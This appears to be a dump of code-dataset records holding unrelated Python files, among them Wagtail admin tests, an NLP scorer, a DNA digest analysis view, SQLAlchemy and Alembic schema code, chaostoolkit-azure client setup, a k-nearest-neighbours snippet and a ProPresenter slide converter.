  • \")\n\n\nclass TestDisablePreviewButton(TestCase, WagtailTestUtils):\n \"\"\"\n Test that preview button can be disabled by setting preview_modes to an empty list\n \"\"\"\n\n def setUp(self):\n # Find root page\n self.root_page = Page.objects.get(id=2)\n\n # Login\n self.user = self.login()\n\n def test_disable_preview_on_create(self):\n # preview button is available by default\n response = self.client.get(\n reverse(\n \"wagtailadmin_pages:add\",\n args=(\"tests\", \"simplepage\", self.root_page.id),\n )\n )\n self.assertEqual(response.status_code, 200)\n\n preview_url = reverse(\n \"wagtailadmin_pages:preview_on_add\",\n args=(\"tests\", \"simplepage\", self.root_page.id),\n )\n self.assertContains(response, '
  • ')\n self.assertContains(response, 'data-action=\"%s\"' % preview_url)\n\n # StreamPage has preview_modes = []\n response = self.client.get(\n reverse(\n \"wagtailadmin_pages:add\",\n args=(\"tests\", \"streampage\", self.root_page.id),\n )\n )\n self.assertEqual(response.status_code, 200)\n\n preview_url = reverse(\n \"wagtailadmin_pages:preview_on_add\",\n args=(\"tests\", \"streampage\", self.root_page.id),\n )\n self.assertNotContains(response, '
  • ')\n self.assertNotContains(response, 'data-action=\"%s\"' % preview_url)\n\n def test_disable_preview_on_edit(self):\n simple_page = SimplePage(title=\"simple page\", content=\"hello\")\n self.root_page.add_child(instance=simple_page)\n\n # preview button is available by default\n response = self.client.get(\n reverse(\"wagtailadmin_pages:edit\", args=(simple_page.id,))\n )\n self.assertEqual(response.status_code, 200)\n\n preview_url = reverse(\n \"wagtailadmin_pages:preview_on_edit\", args=(simple_page.id,)\n )\n self.assertContains(response, '
  • ')\n self.assertContains(response, 'data-action=\"%s\"' % preview_url)\n\n stream_page = StreamPage(title=\"stream page\", body=[(\"text\", \"hello\")])\n self.root_page.add_child(instance=stream_page)\n\n # StreamPage has preview_modes = []\n response = self.client.get(\n reverse(\"wagtailadmin_pages:edit\", args=(stream_page.id,))\n )\n self.assertEqual(response.status_code, 200)\n\n preview_url = reverse(\n \"wagtailadmin_pages:preview_on_edit\", args=(stream_page.id,)\n )\n self.assertNotContains(response, '
  • ')\n self.assertNotContains(response, 'data-action=\"%s\"' % preview_url)\n\n def test_disable_preview_on_revisions_list(self):\n simple_page = SimplePage(title=\"simple page\", content=\"hello\")\n self.root_page.add_child(instance=simple_page)\n simple_page.save_revision(log_action=True)\n\n # check preview shows up by default\n response = self.client.get(\n reverse(\"wagtailadmin_pages:history\", args=(simple_page.id,))\n )\n preview_url = reverse(\n \"wagtailadmin_pages:revisions_view\",\n args=(simple_page.id, simple_page.get_latest_revision().id),\n )\n self.assertContains(response, \"Preview\")\n self.assertContains(response, preview_url)\n\n stream_page = StreamPage(title=\"stream page\", body=[(\"text\", \"hello\")])\n self.root_page.add_child(instance=stream_page)\n latest_revision = stream_page.save_revision(log_action=True)\n\n # StreamPage has preview_modes = []\n response = self.client.get(\n reverse(\"wagtailadmin_pages:history\", args=(stream_page.id,))\n )\n preview_url = reverse(\n \"wagtailadmin_pages:revisions_view\",\n args=(stream_page.id, latest_revision.id),\n )\n self.assertNotContains(response, \"Preview\")\n self.assertNotContains(response, preview_url)\n\n def disable_preview_in_moderation_list(self):\n stream_page = StreamPage(title=\"stream page\", body=[(\"text\", \"hello\")])\n self.root_page.add_child(instance=stream_page)\n latest_revision = stream_page.save_revision(\n user=self.user, submitted_for_moderation=True\n )\n\n response = self.client.get(reverse(\"wagtailadmin_home\"))\n preview_url = reverse(\n \"wagtailadmin_pages:preview_for_moderation\", args=(latest_revision.id,)\n )\n self.assertNotContains(response, '
  • ')\n self.assertNotContains(response, 'data-action=\"%s\"' % preview_url)\n","sub_path":"wagtail/admin/tests/pages/test_preview.py","file_name":"test_preview.py","file_ext":"py","file_size_in_byte":16506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"368028423","text":"\n#Team: Meena Rapaka, K.Siva Naga Lakshmi, Ying ke\n#Assignment 4: Word Sense Disambiguation, file: scorer.py\n\n#The output of decision-list.py file(my-line-answers.txt) is compared with the golden standard key (line-answers.txt) which is #provided, to calulate the accuracy and provide\n#confusion matrix.\n\n##The program should run on command prompt/ terminal, then specify the path of the python file.\n\n#python scorer.py my-line-answers.txt line-answers.txt > wsdreport.txt\n\n#once we execute the above command,a text file is generated as\" wsdreport.txt\" which comprises the results of comparisions of #my-line-answers.txt with line-answers.txt which is resulted as the accuracy.\n#Confusion Matrix is also computed for the above listed comparisions.\n\n#Algorithm\n#1: Input is passed as sys arguments which are decision-list output file(my-line-answers.txt) and test key(line-answers.txt)\n#2: Read the output file to create a dictionary to separate line and sense id \n#3: We are creating a new list to match the key and value pairs\n#4: Match corresponding pairs from the model output to the test key and increment a counter each time when there is a match\n#5: Find the accuracy of the model by dividing based on length as defined in the formula\n#6: Find the confusion matrix by comparing output values with actual key values\n#7: Output is stored into wsdreport.txt\n#END\n\n\n\n\nimport sys\nimport nltk\nimport pandas as pd\nimport scipy\nfrom nltk.metrics import ConfusionMatrix\n\ndef main():\n\n output_file = sys.argv[1] #passing my-line-answers.txt\n key_file = sys.argv[2] #passing line-answers.txt\n \n with open(output_file) as file: #read my-line-answers.txt\n f1 = [line.rstrip('\\n') for line in file] #each line of file is converted into each element of list\n var1= [i.split(':\"', 1) for i in f1] #each line is split based on colon and quotes\n predicted = {} #declaring dictionary\n\n for a in range (1,len(var1)): #dictionary is created is passed instance id as key and sense id as value\n key=var1[a][0]\n value=var1[a][1]\n predicted[key]=value\n #Assuming a list and then using for loop reading the values from predicted and then appending them in the new list which is predicted_list.#\n predicted_list=[] \n for v in predicted:\n predicted_list.append(predicted[v])\n \n with open(key_file) as myf1: #read line-answers.txt \n f2 = [line.rstrip('\\n') for line in myf1] #each line of f1 is converted into each element of list\n var2= [i.split(':\"', 1) for i in f2] #each line is split based on colon and quotes\n observed = {} #declaring dictionary\n\n for a in range (1,len(var2)): # every value from key and value are read\n key=var2[a][0] #for every line in sentence, first part is considered as key\n value=var2[a][1] #second part is considered as sentence\n observed[key]=value\n #Assuming a list and then using for loop reading the values from observed. and then appending them in the new list which is observed_list.# \n observed_list=[]\n for v in observed:\n observed_list.append(observed[v])\n\n cm=ConfusionMatrix(observed_list,predicted_list) #calculating the consfusion matrix\n x=0\n for i in range(len(predicted_list)):\n if predicted_list[i] == observed_list[i]: #comparing both the list values and if it is equal x gets incremented.\n x += 1\n accuracy = (x/len(predicted_list)*100) #calculating the accuracy\n\n\t#Accuracy and confusion matrix is stored in output file viz wsdreport.txt\n print('Accuracy of the classifier is:',accuracy,'\\n\\n''Confusion Matrix: ',str(cm),)\nif __name__ == '__main__':\n main()\n","sub_path":"scorer.py","file_name":"scorer.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"457407826","text":"\"\"\"Bla.\"\"\"\n\nfrom collections import OrderedDict\n\nfrom rest_framework import serializers\nfrom ..base import AsyncWorker, StartJobView\nfrom ..tools import (\n records_from_data_files,\n data_to_html_data,\n file_to_filelike_object,\n did_you_mean,\n set_record_topology,\n matplotlib_figure_to_svg_base64_data,\n)\nfrom ..serializers import FileSerializer\n\nimport flametree\nfrom plateo.parsers import plate_from_platemap_spreadsheet\nfrom bandwitch import Clone, BandsObservation, ClonesObservations\nfrom bandwagon import plot_records_digestions\n\n\ndigestion = serializers.ListField(child=serializers.CharField())\n\n\nclass serializer_class(serializers.Serializer):\n constructsMap = FileSerializer(allow_null=True)\n clonesMap = FileSerializer(allow_null=True)\n constructsSequences = serializers.ListField(child=FileSerializer())\n goal = serializers.CharField()\n uniqueDigestion = serializers.BooleanField()\n digestion = serializers.ListField(child=serializers.CharField())\n digestionsMap = FileSerializer(allow_null=True)\n tolerance = serializers.FloatField()\n bandsRange = serializers.ListField(child=serializers.IntegerField())\n fragmentAnalysisArchive = FileSerializer(allow_null=True)\n includeDigestionPlots = serializers.BooleanField()\n ignoreBandsUnder = serializers.IntegerField()\n rfuSizeRatio = serializers.FloatField()\n subanalysis = serializers.CharField()\n topology = serializers.CharField()\n\n\ndef file_type(f):\n return \"csv\" if f.name.lower().endswith(\"csv\") else \"excel\"\n\n\nclass worker_class(AsyncWorker):\n def work(self):\n self.logger(message=\"Reading the files...\")\n data = self.data\n\n # PARSE ALL FILES\n\n constructs_records = records_from_data_files(data.constructsSequences)\n for record in constructs_records:\n set_record_topology(record, data.topology)\n constructs_records = {r.id: r for r in constructs_records}\n constructs_records = OrderedDict(sorted(constructs_records.items()))\n\n constructs_plate = plate_from_platemap_spreadsheet(\n file_to_filelike_object(data.constructsMap),\n file_type=file_type(data.constructsMap),\n data_field=\"construct\",\n headers=True,\n )\n constructs_map = OrderedDict(\n [\n (well.name, well.data.construct)\n for well in constructs_plate.iter_wells(direction=\"row\")\n if \"construct\" in well.data and str(well.data.construct) != \"nan\"\n ]\n )\n unknown_constructs = {}\n for well, construct in constructs_map.items():\n if construct not in constructs_records:\n unknown_constructs[construct] = {\n \"well\": well,\n \"suggestions\": did_you_mean(construct, constructs_records),\n }\n if len(unknown_constructs):\n return {\"success\": False, \"unknown_constructs\": unknown_constructs}\n\n if data.uniqueDigestion:\n digestion = tuple(data.digestion)\n digestions_map = OrderedDict(\n [(wellname, digestion) for wellname in constructs_map]\n )\n else:\n digestions_plate = plate_from_platemap_spreadsheet(\n file_to_filelike_object(data.digestionsMap),\n file_type=file_type(data.digestionsMap),\n data_field=\"digestion\",\n headers=True,\n )\n digestions_map = OrderedDict(\n [\n (well.name, tuple(well.data.digestion.split(\", \")))\n for well in digestions_plate.iter_wells(direction=\"row\")\n if \"digestion\" in well.data and str(well.data.digestion) != \"nan\"\n ]\n )\n\n archive = file_to_filelike_object(data.fragmentAnalysisArchive)\n\n # ANALYZE ALL FILES AND VALIDATE BANDS\n\n self.logger(message=\"Analyzing the data...\")\n\n observations = BandsObservation.from_aati_fa_archive(\n archive,\n ignore_bands_under=data.ignoreBandsUnder,\n min_rfu_size_ratio=data.rfuSizeRatio,\n )\n clones = Clone.from_bands_observations(\n observations, constructs_map, digestions_map\n )\n clones_observations = ClonesObservations(clones, constructs_records)\n if data.subanalysis == \"partial_digests\":\n return self.partial_digests_analysis(data, clones_observations)\n else:\n return self.validation_analysis(data, clones_observations)\n\n def partial_digests_analysis(self, data, clones_observations):\n analysis = clones_observations.partial_digests_analysis()\n best = max(analysis, key=lambda a: analysis[a][\"valid_clones\"])\n if analysis[best][\"valid_clones\"] == analysis[()][\"valid_clones\"]:\n return {\n \"message\": \"The partial digest analysis did not find any \"\n \"significant results\",\n \"success\": \"yeah!\",\n }\n ax = clones_observations.plot_partial_digests_analysis(analysis)\n validations = analysis[best][\"validations\"]\n observations = ClonesObservations(\n clones_observations.clones,\n clones_observations.constructs_records,\n partial_cutters=best,\n )\n pdf_data = observations.plot_all_validations_patterns(validations)\n return {\n \"pdf_file\": {\n \"data\": data_to_html_data(pdf_data, \"pdf\"),\n \"name\": \"digest_validation_assuming_partial_%s.pdf\" % \"_\".join(best),\n \"mimetype\": \"application/pdf\",\n },\n \"message\": (\n \"The analysis shows that the following enzyme(s) were\"\n \" possibly only partially cutting: %s.
    The report below\"\n \" shows the validation under this hypothesis.\"\n )\n % (\", \".join([\"%s\" % b for b in best])),\n \"figure_data\": matplotlib_figure_to_svg_base64_data(\n ax.figure, bbox_inches=\"tight\"\n ),\n \"success\": \"yeah!\",\n }\n\n def validation_analysis(self, data, clones_observations):\n validations = clones_observations.validate_all_clones(\n min_band_cutoff=data.bandsRange[0],\n max_band_cutoff=data.bandsRange[1],\n relative_tolerance=data.tolerance,\n )\n first_validation = list(validations.values())[0]\n ladder = list(first_validation.clone.digestions.values())[0].ladder\n\n # CREATE A ZIP WITH VALIDATION REPORTS\n\n zip_root = flametree.file_tree(\"@memory\")\n self.logger(message=\"Generating the validation report...\")\n zip_root._file(\"validations.pdf\").write(\n clones_observations.plot_all_validations_patterns(validations)\n )\n clones_observations.validations_summary_table(\n validations, zip_root._file(\"summary.csv\").open(\"w\")\n )\n if data.includeDigestionPlots:\n self.logger(message=\"Plotting cuts maps...\")\n co = clones_observations\n\n plot_records_digestions(\n target=zip_root._file(\"digestions.pdf\").open(\"wb\"),\n ladder=ladder,\n records_and_digestions=[\n (co.constructs_records[cst], digestion_)\n for cst, digestions in co.constructs_digestions.items()\n for digestion_ in digestions\n ],\n )\n # zip_root._file('digestions.pdf').write(pdf_data)\n\n self.logger(message=\"Generating the success plate map...\")\n ax = clones_observations.plot_validations_plate_map(validations)\n ax.figure.savefig(\n zip_root._file(\"success_map.pdf\").open(\"wb\"),\n format=\"pdf\",\n bbox_inches=\"tight\",\n )\n\n self.logger(message=\"All done !\")\n\n return {\n \"zip_file\": {\n \"data\": data_to_html_data(zip_root._close(), \"zip\"),\n \"name\": \"validation_report.zip\",\n \"mimetype\": \"application/zip\",\n },\n \"success\": \"yeah!\",\n }\n\n\nclass AnalyzeDigestsView(StartJobView):\n serializer_class = serializer_class\n worker_class = worker_class\n","sub_path":"backend/app/views/analyze_digests/AnalyzeDigests.py","file_name":"AnalyzeDigests.py","file_ext":"py","file_size_in_byte":8296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"254649644","text":"# 连接数据库cookies\r\nfrom sqlalchemy import create_engine\r\n\r\nDB_URI = \"mysql+pymysql://root:123456@localhost/cookies\"\r\nengine = create_engine(DB_URI, pool_recycle=3600)\r\nconnection = engine.connect() # 可以不要这个行代码\r\n\r\nfrom sqlalchemy import MetaData\r\nmetadata = MetaData()\r\nfrom datetime import datetime\r\nfrom sqlalchemy import Table, Column, Integer, Numeric, String, Boolean, DateTime, ForeignKey\r\nfrom sqlalchemy import CheckConstraint, Index, PrimaryKeyConstraint, UniqueConstraint, ForeignKeyConstraint\r\n\r\ncookies = Table('cookies', metadata,\r\n Column('cookie_id', Integer(), primary_key=True),\r\n Column('cookie_name', String(50)), # “, index=True”可被加进去,内敛的index\r\n Column('cookie_recipe_url', String(255)),\r\n Column('cookie_sku', String(55)),\r\n Column('quantity', Integer()),\r\n Column('unit_cost', Numeric(12, 2))\r\n )\r\nCheckConstraint('unit_cost >= 0.00', name='unit_cost_positive') # Defining the key explicitly\r\nIndex('ix_cookies_cookie_name', 'cookie_name') # Defining an index using an explicit construction type\r\nIndex('ix_test', cookies.c.cookie_sku, cookies.c.cookie_name) # If we want to select by \"cookie_SKU\" and \"cookie_name\"\r\n\r\nusers = Table('users', metadata,\r\n Column('user_id', Integer()),\r\n Column('username', String(15), nullable=False), # Column('username', String(15), nullable=False, unique=True),内敛的unique\r\n Column('email_address', String(255), nullable=False),\r\n Column('phone', String(20), nullable=False),\r\n Column('password', String(25), nullable=False),\r\n Column('created_on', DateTime(), default=datetime.now),\r\n Column('updated_on', DateTime(), default=datetime.now, onupdate=datetime.now)\r\n )\r\nPrimaryKeyConstraint('user_id', name='user_pk') # 以下的“name='XX'”看起来像是备注,可不定义name这个参数\r\nUniqueConstraint('username', name='uix_username') # Defining the key explicitly\r\n\r\norders = Table('orders',metadata,\r\n Column('order_id', Integer(), primary_key=True),\r\n Column('user_id', ForeignKey('users.user_id')), # users表在上面 # 体会ForeignKeyConstraint的显式\r\n Column('shipped', Boolean(), default=False)\r\n )\r\n\r\nline_items = Table('line_items', metadata,\r\n Column('line_items_id', Integer(), primary_key=True),\r\n Column('order_id'),\r\n Column('cookie_id', ForeignKey('cookies.cookie_id')), # 体会ForeignKey是内敛\r\n Column('quantity', Integer()),\r\n Column('extended_cost', Numeric(12, 2))\r\n )\r\nForeignKeyConstraint(['order_id'], ['orders.order_id']) # Creating the ForeignKeyConstraint for the \"order_id\" field betweenthe \"line_items\" and \"orders\" table\r\n# Persisting the schema to the database(cookies)\r\nmetadata.create_all(engine)\r\n","sub_path":"SQLAlchemy/chapter_one.py","file_name":"chapter_one.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"460877233","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Top-level package for chaostoolkit-azure.\"\"\"\n\nfrom typing import List\n\nfrom azure.mgmt.compute import ComputeManagementClient\nfrom azure.mgmt.redis import RedisManagementClient\nfrom azure.mgmt.eventhub import EventHubManagementClient\nfrom azure.mgmt.rdbms.postgresql_flexibleservers import (\n PostgreSQLManagementClient as PostgreSQLFlexibleManagementClient\n)\nfrom azure.mgmt.rdbms.postgresql import PostgreSQLManagementClient\nfrom azure.mgmt.web import WebSiteManagementClient\nfrom azure.mgmt.resourcegraph import ResourceGraphClient\nfrom chaoslib.discovery import (discover_actions, discover_probes,\n initialize_discovery_result)\nfrom chaoslib.types import (Configuration, DiscoveredActivities, Discovery,\n Secrets)\nfrom logzero import logger\n\nfrom chaosazure.auth import auth\nfrom chaosazure.common.config import load_configuration, load_secrets\n\n\n__all__ = [\n \"discover\", \"__version__\", \"init_compute_management_client\",\n \"init_website_management_client\", \"init_resource_graph_client\"\n]\n__version__ = '0.11.0'\n\n\ndef discover(discover_system: bool = True) -> Discovery:\n \"\"\"\n Discover Azure capabilities offered by this extension.\n \"\"\"\n logger.info(\"Discovering capabilities from chaostoolkit-azure\")\n\n discovery = initialize_discovery_result(\n \"chaostoolkit-azure\", __version__, \"azure\")\n discovery[\"activities\"].extend(__load_exported_activities())\n return discovery\n\n\ndef init_compute_management_client(\n experiment_secrets: Secrets,\n experiment_configuration: Configuration) -> ComputeManagementClient:\n \"\"\"\n Initializes Compute management client for virtual machine,\n and virtual machine scale sets resources under Azure Resource manager.\n \"\"\"\n return __azure_client_factory(\"ComputeManagementClient\", Secrets)\n\n\ndef init_postgresql_flexible_management_client(\n experiment_secrets: Secrets,\n experiment_configuration: Configuration) -> PostgreSQLFlexibleManagementClient:\n \"\"\"\n Initializes Relational Database management client for postgresql_flexible,\n resources under Azure Resource manager.\n \"\"\"\n return __azure_client_factory(\"PostgreSQLFlexibleManagementClient\", Secrets)\n\n\ndef init_postgresql_management_client(\n experiment_secrets: Secrets,\n experiment_configuration: Configuration) -> PostgreSQLManagementClient:\n \"\"\"\n Initializes Relational Database management client for postgresql,\n resources under Azure Resource manager.\n \"\"\"\n return __azure_client_factory(\"PostgreSQLManagementClient\", Secrets)\n\n\ndef init_website_management_client(\n experiment_secrets: Secrets,\n experiment_configuration: Configuration) -> WebSiteManagementClient:\n \"\"\"\n Initializes Website management client for webapp resource under Azure\n Resource manager.\n \"\"\"\n return __azure_client_factory(\"WebSiteManagementClient\", Secrets)\n\n\ndef init_resource_graph_client(\n experiment_secrets: Secrets) -> ResourceGraphClient:\n \"\"\"\n Initializes Resource Graph client.\n \"\"\"\n return __azure_client_factory(\"ResourceGraphClient\", Secrets)\n\n\ndef init_redis_client(\n experiment_secrets: Secrets) -> RedisManagementClient:\n \"\"\"\n Initializes Resource Graph client.\n \"\"\"\n return __azure_client_factory(\"RedisManagementClient\", Secrets)\n\n\ndef init_eventhub_client(\n experiment_secrets: Secrets) -> EventHubManagementClient:\n \"\"\"\n Initializes Resource Graph client.\n \"\"\"\n return __azure_client_factory(\"EventHubManagementClient\", Secrets)\n\n\n###############################################################################\n# Private functions\n###############################################################################\ndef __load_exported_activities() -> List[DiscoveredActivities]:\n \"\"\"\n Extract metadata from actions and probes exposed by this extension.\n \"\"\"\n activities = []\n activities.extend(discover_actions(\"chaosazure.machine.actions\"))\n activities.extend(discover_probes(\"chaosazure.machine.probes\"))\n activities.extend(discover_actions(\"chaosazure.aks.actions\"))\n activities.extend(discover_actions(\"chaosazure.vmss.actions\"))\n activities.extend(discover_actions(\"chaosazure.webapp.actions\"))\n activities.extend(discover_probes(\"chaosazure.webapp.probes\"))\n activities.extend(discover_actions(\"chaosazure.postgresql_flexible.actions\"))\n activities.extend(discover_probes(\"chaosazure.postgresql_flexible.probes\"))\n activities.extend(discover_actions(\"chaosazure.postgresql.actions\"))\n activities.extend(discover_probes(\"chaosazure.postgresql.probes\"))\n activities.extend(discover_actions(\"chaosazure.redis.actions\"))\n activities.extend(discover_probes(\"chaosazure.redis.probes\"))\n activities.extend(discover_actions(\"chaosazure.eventhub.actions\"))\n activities.extend(discover_probes(\"chaosazure.eventhub.probes\"))\n return activities\n\n\ndef __azure_client_factory(experiment_secrets: Secrets, client_name: str) -> object:\n \"\"\"\n Simple factory for *Clients in azure.mgmt\n \"\"\"\n secrets = load_secrets(experiment_secrets)\n with auth(secrets) as authentication:\n base_url = secrets.get('cloud').endpoints.resource_manager\n scopes = [base_url + \"/.default\"]\n client = eval(client_name)(\n credential=authentication,\n credential_scopes=scopes,\n base_url=base_url)\n\n return client\n","sub_path":"chaosazure/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"422709569","text":"import hog\nfrom dice import four_sided, six_sided, make_test_dice\nfrom sys import setrecursionlimit\nsetrecursionlimit(20000)\n\ndef final_strategy(score, opponent_score):\n best_num_rolls = 5 if hog.select_dice(score, opponent_score) == six_sided else 3\n\n potential_bacon = hog.potential_bacon_calc(opponent_score)\n score_with_bacon = potential_bacon + score\n\n goal_nums = [\n # Goal number to achieve for a swap\n opponent_score / 2,\n ] + [\n # All goal numbers that would result in the opponent having 4-sided dice\n x for x in range(score, 100) if (x + opponent_score) % 7 == 0 if potential_bacon > 4\n ]\n\n if potential_bacon > 8 or score_with_bacon in goal_nums:\n return 0\n\n sample_amount = 1\n possible_rolls = [0,3,4,5,6]\n roll_results = []\n dice_selection = hog.select_dice(score, opponent_score)\n for num_rolls in possible_rolls:\n wins = 0\n for i in range(sample_amount):\n new_score = hog.take_turn(num_rolls, opponent_score, dice=dice_selection)\n opponent_roll = 5\n opponent_dice = hog.select_dice(opponent_score, new_score)\n new_opponent_score = hog.take_turn(opponent_roll, new_score, dice=opponent_dice)\n r = hog.play(final_strategy, hog.always_roll(5), goal=max(new_score,new_opponent_score)+10, scores=[new_score, new_opponent_score])\n if r[0] > r[1]:\n wins += 1\n roll_results.append(wins)\n\n\n\n return best_num_rolls # Replace this statement\n\nresult = hog.play(final_strategy, hog.always_roll(5), scores=[0,0])\nprint(result)\nprint()\n","sub_path":"projects/hog/hog_strat.py","file_name":"hog_strat.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"352268401","text":"\"\"\"init table\n\nRevision ID: eb631f23cf91\nRevises: \nCreate Date: 2020-05-21 15:04:19.736592\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'eb631f23cf91'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('customer',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('username', sa.String(length=64), nullable=True),\n sa.Column('email', sa.String(length=64), nullable=True),\n sa.Column('phone', sa.String(length=10), nullable=True),\n sa.Column('password_hash', sa.String(length=128), nullable=True),\n sa.Column('fname', sa.String(length=64), nullable=True),\n sa.Column('lname', sa.String(length=64), nullable=True),\n sa.Column('gender', sa.Integer(), nullable=True),\n sa.Column('address', sa.String(length=64), nullable=True),\n sa.Column('state', sa.String(length=2), nullable=True),\n sa.Column('city', sa.String(length=64), nullable=True),\n sa.Column('zip', sa.String(length=5), nullable=True),\n sa.Column('score', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_customer_email'), 'customer', ['email'], unique=True)\n op.create_index(op.f('ix_customer_fname'), 'customer', ['fname'], unique=False)\n op.create_index(op.f('ix_customer_lname'), 'customer', ['lname'], unique=False)\n op.create_index(op.f('ix_customer_phone'), 'customer', ['phone'], unique=True)\n op.create_index(op.f('ix_customer_score'), 'customer', ['score'], unique=False)\n op.create_index(op.f('ix_customer_username'), 'customer', ['username'], unique=True)\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('username', sa.String(length=64), nullable=True),\n sa.Column('email', sa.String(length=120), nullable=True),\n sa.Column('password_hash', sa.String(length=128), nullable=True),\n sa.Column('phone', sa.String(length=10), nullable=True),\n sa.Column('department', sa.String(length=64), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_user_email'), 'user', ['email'], unique=True)\n op.create_index(op.f('ix_user_username'), 'user', ['username'], unique=True)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_user_username'), table_name='user')\n op.drop_index(op.f('ix_user_email'), table_name='user')\n op.drop_table('user')\n op.drop_index(op.f('ix_customer_username'), table_name='customer')\n op.drop_index(op.f('ix_customer_score'), table_name='customer')\n op.drop_index(op.f('ix_customer_phone'), table_name='customer')\n op.drop_index(op.f('ix_customer_lname'), table_name='customer')\n op.drop_index(op.f('ix_customer_fname'), table_name='customer')\n op.drop_index(op.f('ix_customer_email'), table_name='customer')\n op.drop_table('customer')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/eb631f23cf91_init_table.py","file_name":"eb631f23cf91_init_table.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"211709457","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom random import randint\nfrom sklearn.neighbors import NearestNeighbors\nimport math\nimport random\n\n\n#Read in data\ndf = pd.read_csv('http://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data', header=None)\n#Column names\ncols = ['sepal_length', 'sepal_width', 'petal_length', 'petal_width', 'class']\n#Assign column names\ndf.columns = cols\n\n#Scatter plot\nx = df['sepal_length']\ny = df['sepal_width']\n\nplt.scatter(x, y)\nplt.xlabel('Sepal Length')\nplt.ylabel('Sepal Width')\nplt.show()\n\n#pick random point\nrandom.seed()\npt = df.iloc[random.choice(df.index.tolist())]\npt['sepal_length']\n\n#determine distances from random point\ndef dist_from_pt(p):\n return math.sqrt(((pt.sepal_length - p.sepal_length) ** 2) + ((pt.sepal_width - p.sepal_width) ** 2))\n\n#set distances as values in new column\ndf['dist_from_pt'] = df[['sepal_length', 'sepal_width']].apply(func=dist_from_pt, axis=1)\n\n#sort values by distance column\ndf_sorted = df.sort_values(by='dist_from_pt', ascending=True)\n\n#define knn function\ndef knn(k):\n\treturn df_sorted['class'][0:k].value_counts().index[0]\n\n#print majority class based on number of neighbors inputted for k\nprint(knn(25))","sub_path":"machine-learning-gists/d75837b5b18a4512f97de477e49a00a95c69506c/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"502742487","text":"# derived from https://github.com/danthedeckie/OpenLP-To-ProPresenter5-Converter\nimport os\nimport re\nfrom base64 import b64encode\nfrom datetime import datetime\nfrom uuid import uuid1\n\nfrom utils import (load_scottish_psalter, load_sing_psalms, make_output_folder,\n remove_folder, remove_markup, zip_folder)\n\n__re_uni_x = re.compile(r'\\\\x..') # Unicode \\x form\n__re_uni_u = re.compile(r'\\\\u....') # Unicode \\u form\n\n\nDEFAULT_FONT = \"Franklin Gothic Book\"\n\n\ndef make_uuid():\n return uuid1().__str__().upper()\n\n\ndef SuperScRTF(text):\n # superscript verse #s at start of stanza:\n for ii in re.findall(r'uc0 \\d+-*\\d*', text):\n num = ii.lstrip('uc0 ')\n text = text.replace(ii, 'uc0 \\\\super {' + num + '}\\\\nosupersub ')\n # superscript verse #s in middle of stanza:\n for ii in re.findall(r'\\n\\d+-*\\d*', text):\n num = re.findall(r'\\d+-*\\d*', ii)\n text = text.replace(ii, '\\n\\\\super {' + num[0] + '}\\\\nosupersub ')\n return text\n\n\ndef underline_slide(text):\n text = text.replace('', r'{\\lang2057\\ul\\ltrch ')\n text = text.replace('', r'}')\n return text\n\n\ndef convert_unicode_chars(text):\n def conv_char(c):\n o = ord(c)\n if o < 128:\n return c\n else:\n return rf'\\u{o} '\n\n chars = [conv_char(char) for char in text]\n return ''.join(chars)\n\n\ndef MakeRTFBlob(text, font_colour, font_size):\n slide = '{\\\\rtf1\\\\ansi\\\\ansicpg1252\\\\cocoartf1038\\\\cocoasubrtf360{\\\\fonttbl\\\\f0\\\\fswiss\\\\fcharset0 ' + DEFAULT_FONT + ';}' \\\n + '{\\\\colortbl;\\\\red' + font_colour[0] + '\\\\green' + font_colour[1] + '\\\\blue' + font_colour[2] + ';}' \\\n + '\\\\pard\\\\tx560\\\\tx1120\\\\tx1680\\\\tx2240\\\\tx2800\\\\tx3360\\\\tx3920\\\\tx4480\\\\tx5040\\\\tx5600\\\\tx6160\\\\tx6720\\\\qc\\\\pardirnatural' \\\n + '\\\\f0\\\\fs' + str(font_size * 2) + '\\\\fsmilli51200 \\\\cf1 \\\\expnd0\\\\expndtw0\\\\kerning0 \\\\uc0 ' + \\\n convert_unicode_chars(text.lstrip(\"\\n\")) + '}'\n slide = SuperScRTF(slide)\n slide = underline_slide(slide)\n slide = slide.replace('\\n', '\\\\\\n')\n return b64encode(slide.encode()).decode()\n\n\ndef SlideBlock(text, screen_size, font_colour, background_colour):\n if screen_size[0] == '1080':\n font_size = 90\n else:\n font_size = 72\n\n return '<_-RVRect3D-_position x=\"0\" y=\"0\" z=\"0\" width=\"' + \\\n screen_size[1] + \\\n '\" height=\"' + \\\n screen_size[0] + \\\n '\"><_-D-_serializedShadow containerClass=\"NSMutableDictionary\"><_-RVProTransitionObject-_transitionObject transitionType=\"-1\" transitionDuration=\"1\" 